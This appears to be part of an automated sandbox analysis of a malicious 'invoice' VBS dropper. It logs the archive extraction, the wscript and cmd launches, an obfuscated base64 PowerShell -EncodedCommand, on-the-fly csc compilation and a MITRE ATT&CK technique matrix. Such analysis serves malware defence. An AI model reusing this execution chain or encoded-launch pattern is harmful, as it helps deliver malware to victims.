    Source: C:\Windows\SysWOW64\wscript.exeProcess created: Base64 decoded #Nandinme5 Bobleka Artikuler hotm Formnin4 Vigesimoki6 stom Echinit6 pronativ Pyro Texttv7 Elevatorfr RAMRODSA Qekursuss beanpo Skrk2 polari medeola Lora Raphi6 #defa pied Tandkdsbe Unimmor Badgerb6 exclus Chondrog8 AEROLO FISHERMANI FAGINTEGR Incepto3 Snurl6 Bisexua dosser gavel metafore tran atak Seismi2 Nonfabul Digtek3 REGNSKA Phytome9 Murae Halv8 VOCIFERATE WOODCRAFT hardheart Knib sejt #Immervk8 Sprogfl REDSHI siffleus Super rifters Grouch Proeveti PROTENSI Lydbillede SUBELECTR Rammetchor CISSESAR Bred jordfste Antisens LOXO #Splurgypy7 Septen Dims Tebrevsunc2 Stttep2 likvide Aftvi pantog vejbyg coco ISBRY PASS Pinf munikat unse GULDR Melodiou panimete Raftesoste avancement Enteasubpr MYCE Tidlnnede3 odyssen dryptrren perso #horn Centr4 Henrykkesl8 FORDAMPNIN Intrafol Caldron infr valg SISYRI Genoako skadegrer Underafsni2 Vaccinat drillerier CHAI #Detoxif afmali Hmmetn Alkoholtyp9 linie TAARN mero Spectro8 stjern Positio Autobio utakne Humanhoo3 ompl Bevisfrels3 Brillefode6 EJENDOMS Turistk4 chantant bondesta BILFRAGTER SIDHEPRE #Skident aanderfiau Tallwoo5 vinologist LOYALE Valeri4 lavin Baar9 forventel Nonconv #PERSONNAV idemp start choyainti loxict Hestebre1 Foelebal Mois Lallet Obelisk3 drikk Lanasr #bestraalin STRMPEH VEDL Myelo Dish Accept1 Unpl3 ARBEJDSLSH Anmeldelse SKOVHYTTE prsteskab Publicis8 Umindel4 #sportsma Dkningss4 Deposi1 regningsfu suspe Deba requir Saltstenm1 RDEPANGI #Selvmodsig SUBD kvksfinge Anom thailnde Ondu nonp WINDB
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: Base64 decoded #Nandinme5 Bobleka Artikuler hotm Formnin4 Vigesimoki6 stom Echinit6 pronativ Pyro Texttv7 Elevatorfr RAMRODSA Qekursuss beanpo Skrk2 polari medeola Lora Raphi6 #defa pied Tandkdsbe Unimmor Badgerb6 exclus Chondrog8 AEROLO FISHERMANI FAGINTEGR Incepto3 Snurl6 Bisexua dosser gavel metafore tran atak Seismi2 Nonfabul Digtek3 REGNSKA Phytome9 Murae Halv8 VOCIFERATE WOODCRAFT hardheart Knib sejt #Immervk8 Sprogfl REDSHI siffleus Super rifters Grouch Proeveti PROTENSI Lydbillede SUBELECTR Rammetchor CISSESAR Bred jordfste Antisens LOXO #Splurgypy7 Septen Dims Tebrevsunc2 Stttep2 likvide Aftvi pantog vejbyg coco ISBRY PASS Pinf munikat unse GULDR Melodiou panimete Raftesoste avancement Enteasubpr MYCE Tidlnnede3 odyssen dryptrren perso #horn Centr4 Henrykkesl8 FORDAMPNIN Intrafol Caldron infr valg SISYRI Genoako skadegrer Underafsni2 Vaccinat drillerier CHAI #Detoxif afmali Hmmetn Alkoholtyp9 linie TAARN mero Spectro8 stjern Positio Autobio utakne Humanhoo3 ompl Bevisfrels3 Brillefode6 EJENDOMS Turistk4 chantant bondesta BILFRAGTER SIDHEPRE #Skident aanderfiau Tallwoo5 vinologist LOYALE Valeri4 lavin Baar9 forventel Nonconv #PERSONNAV idemp start choyainti loxict Hestebre1 Foelebal Mois Lallet Obelisk3 drikk Lanasr #bestraalin STRMPEH VEDL Myelo Dish Accept1 Unpl3 ARBEJDSLSH Anmeldelse SKOVHYTTE prsteskab Publicis8 Umindel4 #sportsma Dkningss4 Deposi1 regningsfu suspe Deba requir Saltstenm1 RDEPANGI #Selvmodsig SUBD kvksfinge Anom thailnde Ondu nonp WINDBJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbg
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbgJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\jgrsfdcl.bp3" "C:\Users\user\Desktop\WWVN_INVOICE_8363567453.lzhJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jgrsfdcl.bp3\WWVN_INVOICE_8363567453.vbsJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\jgrsfdcl.bp3\WWVN_INVOICE_8363567453.vbs" Jump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbgJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xd0x2kfy\xd0x2kfy.cmdlineJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES571F.tmp" "c:\Users\user\AppData\Local\Temp\xd0x2kfy\CSC444B4F613D554F189420B3812D9BACB.TMP"Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts11
    Command and Scripting Interpreter
    Path Interception11
    Process Injection
    1
    Masquerading
    OS Credential Dumping1
    Security Software Discovery
    Remote Services1
    Archive Collected Data
    Exfiltration Over Other Network Medium1
    Encrypted Channel
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default Accounts211
    Scripting
    Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
    Disable or Modify Tools
    LSASS Memory1
    Process Discovery
    Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
    Application Layer Protocol
    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain Accounts2
    PowerShell
    Logon Script (Windows)Logon Script (Windows)21
    Virtualization/Sandbox Evasion
    Security Account Manager21
    Virtualization/Sandbox Evasion
    SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
    Process Injection
    NTDS1
    Application Window Discovery
    Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
    Deobfuscate/Decode Files or Information
    LSA Secrets1
    File and Directory Discovery
    SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.common211
    Scripting
    Cached Domain Credentials13
    System Information Discovery
    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup Items1
    Obfuscated Files or Information
    DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
